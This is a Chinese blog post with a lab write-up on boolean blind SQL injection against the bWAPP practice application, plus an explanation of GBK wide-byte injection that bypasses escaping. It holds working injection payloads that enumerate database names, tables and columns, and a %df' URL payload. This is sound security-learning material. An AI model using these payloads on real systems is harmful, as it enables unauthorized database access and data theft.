<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="布尔盲注基本流程1.判断注入点123&#39;&#39; or 1&#x3D;1#&#39; or 1&#x3D;2#     2.判断数据库长度并逐个爆破(count&#x2F;length&#x2F;mid) 使用length()函数判断数据库长度（二分法）  1234-- 前面放回false 执行or 后面的语句如果返回true则数据库长度大于该值，反之小于&#39; or length(database()) &gt;  8#&#39; or length(datab">
<meta property="og:type" content="article">
<meta property="og:title" content="bWAPP-SQLiBlind">
<meta property="og:url" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/index.html">
<meta property="og:site_name" content="Tansz">
<meta property="og:description" content="布尔盲注基本流程1.判断注入点123&#39;&#39; or 1&#x3D;1#&#39; or 1&#x3D;2#     2.判断数据库长度并逐个爆破(count&#x2F;length&#x2F;mid) 使用length()函数判断数据库长度（二分法）  1234-- 前面放回false 执行or 后面的语句如果返回true则数据库长度大于该值，反之小于&#39; or length(database()) &gt;  8#&#39; or length(datab">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922204246265.png">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922204329452.png">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922204338283.png">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922204457549.png">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922204522341.png">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922204636118.png">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922204814865.png">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922205443795.png">
<meta property="og:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922205754286.png">
<meta property="article:published_time" content="2020-09-22T12:22:57.023Z">
<meta property="article:modified_time" content="2020-09-23T12:32:54.999Z">
<meta property="article:author" content="Tansz">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/image-20200922204246265.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>bWAPP-SQLiBlind</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/09/23/bWAPP-SQLIBlind2/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/09/22/bWAPP-SQLiXML/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&text=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&is_video=false&description=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=bWAPP-SQLiBlind&body=Check out this article: http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&name=bWAPP-SQLiBlind&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&t=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#布尔盲注"><span class="toc-number">1.</span> <span class="toc-text">布尔盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#基本流程"><span class="toc-number">1.1.</span> <span class="toc-text">基本流程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-判断注入点"><span class="toc-number">1.1.1.</span> <span class="toc-text">1.判断注入点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-判断数据库长度并逐个爆破-count-length-mid"><span class="toc-number">1.1.2.</span> <span class="toc-text">2.判断数据库长度并逐个爆破(count&#x2F;length&#x2F;mid)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#爆破表的个数-长度-表名-count-length-mid"><span class="toc-number">1.1.3.</span> <span class="toc-text">爆破表的个数&#x2F;长度&#x2F;表名(count&#x2F;length&#x2F;mid)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#爆破列个数-长度-列名-count-length-mid"><span class="toc-number">1.1.4.</span> <span class="toc-text">爆破列个数&#x2F;长度&#x2F;列名(count&#x2F;length&#x2F;mid)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#base"><span class="toc-number">1.2.</span> <span class="toc-text">base</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#low"><span class="toc-number">1.2.1.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mid-high"><span class="toc-number">1.2.2.</span> <span class="toc-text">mid&#x2F;high</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#宽字节注入"><span class="toc-number">2.</span> <span class="toc-text">宽字节注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#注入原理"><span class="toc-number">2.1.</span> <span class="toc-text">注入原理</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        bWAPP-SQLiBlind
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Tansz</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-09-22T12:22:57.023Z" itemprop="datePublished">2020-09-22</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h1><h2 id="基本流程"><a href="#基本流程" class="headerlink" title="基本流程"></a>基本流程</h2><h3 id="1-判断注入点"><a href="#1-判断注入点" class="headerlink" title="1.判断注入点"></a>1.判断注入点</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">'</span><br><span class="line">' or 1=1<span class="comment">#</span></span><br><span class="line">' or 1=2<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922204246265.png" alt="image-20200922204246265"></p>
<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922204329452.png" alt="image-20200922204329452"></p>
<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922204338283.png" alt="image-20200922204338283"></p>
<h3 id="2-判断数据库长度并逐个爆破-count-length-mid"><a href="#2-判断数据库长度并逐个爆破-count-length-mid" class="headerlink" title="2.判断数据库长度并逐个爆破(count/length/mid)"></a>2.判断数据库长度并逐个爆破(count/length/mid)</h3><ul>
<li>使用length()函数判断数据库长度（二分法）</li>
</ul>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 前面放回false 执行or 后面的语句如果返回true则数据库长度大于该值，反之小于</span></span><br><span class="line">' or length(database()) &gt;  8#</span><br><span class="line">' or length(database()) &gt;  4#</span><br><span class="line">' or length(database()) &gt;  6#</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922204457549.png" alt="image-20200922204457549"></p>
<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922204522341.png" alt="image-20200922204522341"></p>
<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922204636118.png" alt="image-20200922204636118"></p>
<p>故数据库长度为5</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' or length(database()) =  5<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922204814865.png" alt="image-20200922204814865"></p>
<ul>
<li><p>逐个字符爆破数据库名</p>
<p>使用<code>mid</code>或<code>substring</code>截取字符并逐个判断</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--' or ascii(mid(database(),1,1))&gt;110 #</span></span><br><span class="line">' or ascii(substring(database(),1,1))&gt;100 # （false）</span><br><span class="line">' or ascii(substring(database(),1,1))&gt;95 # (true)</span><br><span class="line">' or ascii(substring(database(),1,1))&gt;97 # (true)</span><br><span class="line">' or ascii(substring(database(),1,1))&gt;99 # (flase)</span><br><span class="line">' or ascii(substring(database(),1,1))= 98 <span class="comment"># (true)</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922205443795.png" alt="image-20200922205443795"></p>
<p>98对应为字符 b </p>
<p><a href="https://tool.ip138.com/ascii_code/" target="_blank" rel="noopener">ascii码对照</a></p>
<p><img src="/2020/09/22/bWAPP-SQLiBlind/image-20200922205754286.png" alt="image-20200922205754286"></p>
<p>以此类推得到表名</p>
</li>
</ul>
<h3 id="爆破表的个数-长度-表名-count-length-mid"><a href="#爆破表的个数-长度-表名-count-length-mid" class="headerlink" title="爆破表的个数/长度/表名(count/length/mid)"></a>爆破表的个数/长度/表名(count/length/mid)</h3><ul>
<li>爆破表的个数</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">’ or (<span class="keyword">select</span> <span class="keyword">count</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>())&gt;<span class="number">5</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>

<ul>
<li>爆破表的长度</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' or length((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>)) &gt; <span class="number">5</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>

<ul>
<li>爆破字符</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' or ascii(mid((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) &gt; <span class="number">100</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>

<h3 id="爆破列个数-长度-列名-count-length-mid"><a href="#爆破列个数-长度-列名-count-length-mid" class="headerlink" title="爆破列个数/长度/列名(count/length/mid)"></a>爆破列个数/长度/列名(count/length/mid)</h3><ul>
<li>爆破列的个数</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' or (<span class="keyword">select</span> <span class="keyword">count</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="string">'users'</span>) &gt; <span class="number">5</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>

<ul>
<li>爆破列的长度</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">' or length((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> </span><br><span class="line"> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>)) &gt; <span class="number">5</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>

<ul>
<li>爆破列名</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">' or ascii(mid((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> </span><br><span class="line"> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) &gt; <span class="number">105</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>



<h2 id="base"><a href="#base" class="headerlink" title="base"></a>base</h2><h3 id="low"><a href="#low" class="headerlink" title="low"></a>low</h3><p>直接注入，可使用sqlmap进行注入</p>
<h3 id="mid-high"><a href="#mid-high" class="headerlink" title="mid/high"></a>mid/high</h3><p>采用了addslashed()和mysqli_real_escape_string()函数, </p>
<p>且mysql编码和os编码一致, 无法用宽字节绕过,</p>
<h1 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h1><h2 id="注入原理"><a href="#注入原理" class="headerlink" title="注入原理"></a>注入原理</h2><p>注入原理很简单, 就是编码, 一点一点分析:</p>
<p>假设一个url有注入, 但是有安全函数, 我们敲单引号会被过滤，那么怎么办呢？这时候就利用GBK双字节注入</p>
<p>我们在后边这么构造url一个尝试:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.****.com&#x2F;index.php?id&#x3D;1%df&#39; and 1&#x3D;1</span><br></pre></td></tr></table></figure>

<p>其中,</p>
<p><strong>%df ‘ 经过安全函数之后在 ‘ 之前会被加上一个转义符号’&#39;, 即: %df &#39;</strong></p>
<p>由于采用的是url编码, 最后转化为:</p>
<p><strong>%df%5c%27</strong></p>
<p>关键就在这，%df会吃掉%5c，形成一个新的字节, 形象一点就是%df遇到%5c会把%5c吃掉，形成%df%5c，这个编码经过代码</p>
<p>解码后会形成一个汉字“誠”</p>
<p>还不明白? 没关系, 举一个简单的栗子:</p>
<p>xi’an (西安) ==&gt; xian(先) </p>
<p>值得一提的是, 并不是唯一的使用%df, <strong>只要编码超过ascii码(128)之后, 可以自己组合。只要是汉字就都可以使用</strong></p>
<p><strong>总的来解释一下,</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">因为%df的关系，\的编码%5c被吃掉了，也就失去了转义的效果，即安全函数丧失了作用, 被直接带入到mysql中，然后mysql在解读时无视了%df%5c形成的新字节，那么单引号便重新发挥了效果, 就可以构造注入了。</span><br></pre></td></tr></table></figure>

<p><a href="https://blog.csdn.net/angry_program/article/details/103860262" target="_blank" rel="noopener">宽字节注入</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#布尔盲注"><span class="toc-number">1.</span> <span class="toc-text">布尔盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#基本流程"><span class="toc-number">1.1.</span> <span class="toc-text">基本流程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-判断注入点"><span class="toc-number">1.1.1.</span> <span class="toc-text">1.判断注入点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-判断数据库长度并逐个爆破-count-length-mid"><span class="toc-number">1.1.2.</span> <span class="toc-text">2.判断数据库长度并逐个爆破(count&#x2F;length&#x2F;mid)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#爆破表的个数-长度-表名-count-length-mid"><span class="toc-number">1.1.3.</span> <span class="toc-text">爆破表的个数&#x2F;长度&#x2F;表名(count&#x2F;length&#x2F;mid)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#爆破列个数-长度-列名-count-length-mid"><span class="toc-number">1.1.4.</span> <span class="toc-text">爆破列个数&#x2F;长度&#x2F;列名(count&#x2F;length&#x2F;mid)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#base"><span class="toc-number">1.2.</span> <span class="toc-text">base</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#low"><span class="toc-number">1.2.1.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mid-high"><span class="toc-number">1.2.2.</span> <span class="toc-text">mid&#x2F;high</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#宽字节注入"><span class="toc-number">2.</span> <span class="toc-text">宽字节注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#注入原理"><span class="toc-number">2.1.</span> <span class="toc-text">注入原理</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&text=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&is_video=false&description=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=bWAPP-SQLiBlind&body=Check out this article: http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&title=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&name=bWAPP-SQLiBlind&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2020/09/22/bWAPP-SQLiBlind/&t=bWAPP-SQLiBlind" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    1970-2020
    Tansz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
